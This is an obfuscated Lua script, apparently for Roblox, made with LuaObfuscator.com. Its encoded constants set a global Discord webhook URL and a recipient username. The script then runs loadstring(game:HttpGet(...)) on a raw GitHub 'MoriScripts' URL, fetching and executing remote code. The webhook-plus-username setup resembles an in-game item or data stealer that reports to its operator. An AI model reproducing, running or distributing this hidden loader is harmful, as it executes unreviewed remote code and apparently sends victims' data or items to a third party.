--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * 256) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=0 -0 ;local v35;local v36;local v37;local v38;local v39;local v40;while true do if (v34==(4 -2)) then v39=v21(v36,640 -(555 + 64) ,962 -(857 + 74) );v40=((v21(v36,600 -(270 + 97 + 201) )==(928 -(214 + 713))) and  -(1 + 0)) or 1 ;v34=3;end if (v34==(1 + 0)) then v37=878 -(282 + (1460 -865)) ;v38=(v21(v36,1638 -(1523 + 114) ,18 + 2 ) * (2^((34 + 11) -13))) + v35 ;v34=1067 -(68 + (3962 -2965)) ;end if (v34==3) then if (v39==(1270 -(226 + 1044))) then if (v38==(952 -(802 + 150))) then return v40 * 0 ;else v39=4 -3 ;v37=117 -(32 + 85) ;end elseif (v39==(2007 + 40)) then return ((v38==0) and (v40 * ((1 + 0)/(957 -(892 + 65))))) or (v40 * NaN) ;end return v8(v40,v39-(2440 -1417) ) * (v37 + (v38/(((7 -4) -1)^(94 -42)))) ;end if (v34==(350 -(87 + 263))) then v35=v24();v36=v24();v34=181 -(67 + 113) ;end end end v26=nil;function v26(v41)local v42=(442 -(416 + 26)) -0 ;local v43;local v44;while true do if (v42==(3 -1)) then v44={};for v77=1 + 0 , #v43 do v44[v77]=v2(v1(v3(v43,v77,v77)));end v42=1 + 2 ;end if (v42==(997 -(915 + 82))) then v43=nil;if  not v41 then v41=v24();if (v41==(0 -0)) then return "";end end v42=(3 -2) + 0 ;end if (3==v42) then return v6(v44);end if (v42==(3 -2)) then v43=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;v42=1189 -(1069 + 118) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v45==2) then v50=nil;v51=nil;v45=3;end if (v45==(0 -0)) then v46=241 -(187 + 54) ;v47=nil;v45=1;end if (3==v45) then v52=nil;while true do local v79=0;while true do if (v79~=(780 -(162 + 618))) then else if (v46==1) then local v103=0;while true do if (v103==(2 + 0)) then v46=2 + 0 ;break;end if (v103==(0 -0)) then local v111=0 -0 ;while true do if (v111~=(0 + 0)) then else v51=v24();v52={};v111=1637 -(1373 + 263) ;end if (v111==(1001 -(451 + 549))) then v103=1 + 0 ;break;end end end if (1==v103) then local v112=0;while true do if (v112==0) then for v114=1,v51 do local v115=0 -0 ;local v116;local v117;local v118;local v119;while true do if (0==v115) then v116=0;v117=nil;v115=1 -0 ;end if (v115==(1386 -(746 + 638))) then while true do if (v116==1) then v119=nil;while true do if (v117~=0) then else local v185=0;while true do if (v185~=0) then else v118=v22();v119=nil;v185=1 + 0 ;end if (v185~=(1 -0)) then else v117=342 -(218 + 123) ;break;end end end if (v117~=(1582 -(1535 + 46))) then else if (v118==(1 + 0)) then v119=v22()~=0 ;elseif (v118==(1 + 1)) then v119=v25();elseif (v118~=3) then else v119=v26();end v52[v114]=v119;break;end end break;end if (v116==0) then v117=0;v118=nil;v116=1;end end break;end if ((561 -(306 + 254))~=v115) then else v118=nil;v119=nil;v115=1 + 1 ;end end end v50[3]=v22();v112=1;end if (v112==(1 -0)) then v103=1469 -(899 + 568) ;break;end end end end end if (v46==(2 + 0)) then for v104=2 -1 ,v24() do local v105=603 -(268 + 335) ;local v106;local v107;local v108;while true do if (v105~=(291 -(60 + 230))) then else v108=nil;while true do if (v106~=0) then else local v120=0;local v121;while true do if (v120~=0) then else v121=0;while true do if (v121==0) then local v182=572 -(426 + 146) ;while true do if (v182~=0) then else v107=0;v108=nil;v182=1 + 0 ;end if (v182==1) then v121=1457 -(282 + 1174) ;break;end end end if (v121==(812 -(569 + 242))) then v106=1;break;end end break;end end end if (v106==1) then while true do if (v107~=(0 -0)) then else v108=v22();if (v21(v108,1,1 + 0 )==0) then local v170=0;local v171;local v172;local v173;local v174;local v175;local v176;while true do if (v170==0) then v171=0;v172=nil;v170=1025 -(706 + 318) ;end if ((1253 -(721 + 530))~=v170) then else v175=nil;v176=nil;v170=1274 -(945 + 326) ;end if (v170==(2 -1)) then v173=nil;v174=nil;v170=2;end if (v170==(3 + 0)) then while true do if (v171==0) then local v187=700 -(271 + 429) ;while true do if ((0 + 0)==v187) then v172=1500 -(1408 + 92) ;v173=nil;v187=1087 -(461 + 625) ;end if (v187~=(1289 -(993 + 295))) then else v171=1 + 0 ;break;end end end if (v171~=(1172 -(418 + 753))) then else local v188=0;while true do if (v188==(1 + 0)) then v171=1 + 1 ;break;end if (v188==(0 + 0)) then v174=nil;v175=nil;v188=1;end end end if (v171==(1 + 1)) then v176=nil;while true do if (v172==2) then while true do if (1==v173) then local v193=0;local v194;while true do if (v193==0) then v194=529 -(406 + 123) ;while true do if (v194==(1769 -(1749 + 20))) then local v203=0 + 0 ;while true do if ((1322 -(1249 + 73))==v203) then local v208=0;while true do if (v208==(0 + 0)) then v176={v23(),v23(),nil,nil};if (v174==(0 -0)) then local v211=0 -0 ;local v212;local v213;while true do if (v211~=(1901 -(106 + 1794))) then else while true do if (v212==(0 + 0)) then v213=0;while true do if (v213==(0 + 0)) then v176[3]=v23();v176[11 -7 ]=v23();break;end end break;end end break;end if (v211~=(0 -0)) then else v212=114 -(4 + 110) ;v213=nil;v211=585 -(57 + 527) ;end end elseif (v174==(1428 -(41 + 1386))) then v176[106 -(17 + 86) ]=v24();elseif (v174==(2 + 0)) then v176[3]=v24() -((3 -1)^(46 -30)) ;elseif (v174==3) then local v216=166 -(122 + 44) ;local v217;local v218;while true do if (v216~=0) then else local v221=0;while true do if (v221~=1) then else v216=1;break;end if (v221~=(0 -0)) then else v217=0;v218=nil;v221=3 -2 ;end end end if ((1 + 0)~=v216) then else while true do if (v217~=0) then else v218=0 + 0 ;while true do if (0==v218) then v176[5 -2 ]=v24() -((67 -(30 + 35))^(11 + 5)) ;v176[1261 -(1043 + 214) ]=v23();break;end end break;end end break;end end end v208=1;end if (v208==(3 -2)) then v203=1213 -(323 + 889) ;break;end end end if (v203==(2 -1)) then v194=1;break;end end end if (v194==(581 -(361 + 219))) then v173=322 -(53 + 267) ;break;end end break;end end end if (v173==(1 + 2)) then if (v21(v175,3,3)==(414 -(15 + 398))) then v176[4]=v52[v176[4]];end v47[v104]=v176;break;end if (v173~=0) then else local v196=0;local v197;local v198;while true do if (v196~=1) then else while true do if (v197==(982 -(18 + 964))) then v198=0;while true do if (v198==1) then v173=3 -2 ;break;end if (v198==0) then local v209=0;while true do if (v209==0) then local v210=0;while true do if (v210==(0 + 0)) then v174=v21(v108,2 + 0 ,853 -(20 + 830) );v175=v21(v108,4,6);v210=1;end if (v210~=(1 + 0)) then else v209=1;break;end end end if (v209==(127 -(116 + 10))) then v198=1 + 0 ;break;end end end end break;end end break;end if (0~=v196) then else v197=738 -(542 + 196) ;v198=nil;v196=1 -0 ;end end end if (2==v173) then local v199=0 + 0 ;local v200;while true do if (v199~=0) then else v200=0;while true do if (v200==0) then if (v21(v175,1 + 0 ,1)==1) then v176[2]=v52[v176[2]];end if (v21(v175,2,2)==1) then v176[2 + 1 ]=v52[v176[7 -4 ]];end v200=1;end if (v200==(2 -1)) then v173=3;break;end end break;end end end end break;end if (v172~=1) then else local v189=1551 -(1126 + 425) ;local v190;while true do if (0~=v189) then else v190=0;while true do if (v190==1) then v172=407 -(118 + 287) ;break;end if (v190~=(0 -0)) then else v175=nil;v176=nil;v190=1;end end break;end end end if (v172~=(1121 -(118 + 1003))) then else local v191=0 -0 ;local v192;while true do if (v191==(377 -(142 + 235))) then v192=0 -0 ;while true do if (v192~=1) then else v172=1;break;end if ((0 + 0)==v192) then v173=0;v174=nil;v192=1;end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v105==(977 -(553 + 424))) then v106=0;v107=nil;v105=1 -0 ;end end end for v109=1 + 0 ,v24() do v48[v109-1 ]=v29();end return v50;end v79=1 + 0 ;end if (v79~=(1 + 0)) then else if (v46==(0 + 0)) then v47={};v48={};v49={};v50={v47,v48,nil,v49};v46=1;end break;end end end break;end if (v45~=1) then else v48=nil;v49=nil;v45=2;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then local v68=0;while true do if (v68==0) then v20=v0(v3(v53,1,1));return "";end end else local v69=v2(v0(v53,16));if v20 then local v80=v5(v69,v20);v20=nil;return v80;else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + (7 -(2 + 2)) );v19=v19 + (8 -(1333 -(797 + 532))) ;return (v57 * (4878682 + 11898534)) + (v56 * (316713 -251177)) + (v55 * (1009 -(239 + 514))) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end if (v61==1) then v64=v58[3];return function(...)local v81=v62;local v82=v63;local v83=v64;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=10) then if (v94<=4) then if (v94<=1) then if (v94>0) then v91[v93[2]]=v60[v93[3]];else local v124=v93[2];local v125,v126=v84(v91[v124](v13(v91,v124 + 1 ,v93[3])));v86=(v126 + v124) -1 ;local v127=0;for v145=v124,v86 do local v146=0;while true do if (v146==0) then v127=v127 + 1 ;v91[v145]=v125[v127];break;end end end end elseif (v94<=2) then v91[v93[2]]=v60[v93[3]];elseif (v94>3) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else do return;end end elseif (v94<=7) then if (v94<=5) then v85=v93[3];elseif (v94>6) then local v147=0;local v148;local v149;while true do if (v147==1) then v91[v148 + 1 ]=v149;v91[v148]=v149[v93[4]];break;end if (v147==0) then v148=v93[2];v149=v91[v93[3]];v147=1;end end else v91[v93[2]]();end elseif (v94<=8) then local v131=v93[2];local v132=v91[v93[3]];v91[v131 + 1 ]=v132;v91[v131]=v132[v93[4]];elseif (v94>9) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]][v93[3]]=v93[4];end elseif (v94<=15) then if (v94<=12) then if (v94>11) then local v136=0;local v137;while true do if (v136==0) then v137=v93[2];v91[v137]=v91[v137](v13(v91,v137 + 1 ,v86));break;end end else v91[v93[2]]();end elseif (v94<=13) then local v138=0;local v139;local v140;local v141;local v142;while true do if (v138==0) then v139=v93[2];v140,v141=v84(v91[v139](v13(v91,v139 + 1 ,v93[3])));v138=1;end if (v138==1) then v86=(v141 + v139) -1 ;v142=0;v138=2;end if (v138==2) then for v168=v139,v86 do local v169=0;while true do if (v169==0) then v142=v142 + 1 ;v91[v168]=v140[v142];break;end end end break;end end elseif (v94==14) then v91[v93[2]]=v93[3]~=0 ;else v91[v93[2]]=v93[3];end elseif (v94<=18) then if (v94<=16) then do return;end elseif (v94>17) then v91[v93[2]]=v93[3];else v85=v93[3];end elseif (v94<=19) then v91[v93[2]][v93[3]]=v93[4];elseif (v94>20) then v91[v93[2]]=v93[3]~=0 ;else local v159=v93[2];v91[v159]=v91[v159](v13(v91,v159 + 1 ,v86));end v85=v85 + 1 ;break;end if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v70=0 + 0 + 0 ;local v71;while true do if (v70==0) then v71=(v65/((1 + 1)^(v66-(2 -1))))%((338 -(144 + 192))^(((v67-(1203 -(279 + 94 + 829))) -(v66-(732 -(476 + 255)))) + (1976 -(1913 + 62)) + 0)) ;return v71-(v71%(1131 -(369 + 761))) ;end end else local v72=0 + 0 ;local v73;while true do if (v72==(1504 -(363 + 1141))) then v73=(1582 -(1183 + 397))^(v66-(2 -1)) ;return (((v65%(v73 + v73))>=v73) and (1 -0)) or (0 -(0 + 0)) ;end end end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3139363432302O353034383639353937302F7A646859565978794948546353594B6C58646552445154325469575A503749794C684C392D7A78316232386566507668634A6771785064726741504B316D3445614A7153030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030E3O004D69676874795363656E7430397103093O00557365724E616D653200173O002O123O00013O00260A3O000E000100020004113O000E0001001201000100033O003013000100040005001201000100063O001201000200073O002007000200020008002O12000400094O0015000500016O000200054O000C00013O00022O000B0001000100010004113O0016000100260A3O0001000100010004113O00010001001201000100033O0030130001000A000B001201000100033O0030130001000C000B002O123O00023O0004113O000100012O00103O00017O00",v9(),...);end
